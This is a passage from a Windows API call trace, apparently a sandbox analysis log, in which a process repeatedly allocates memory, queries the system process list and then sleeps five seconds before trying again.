ResultLength=0x0) returned 0x0 [0214.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.410] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.432] NtAllocateVirtualMemory (in: 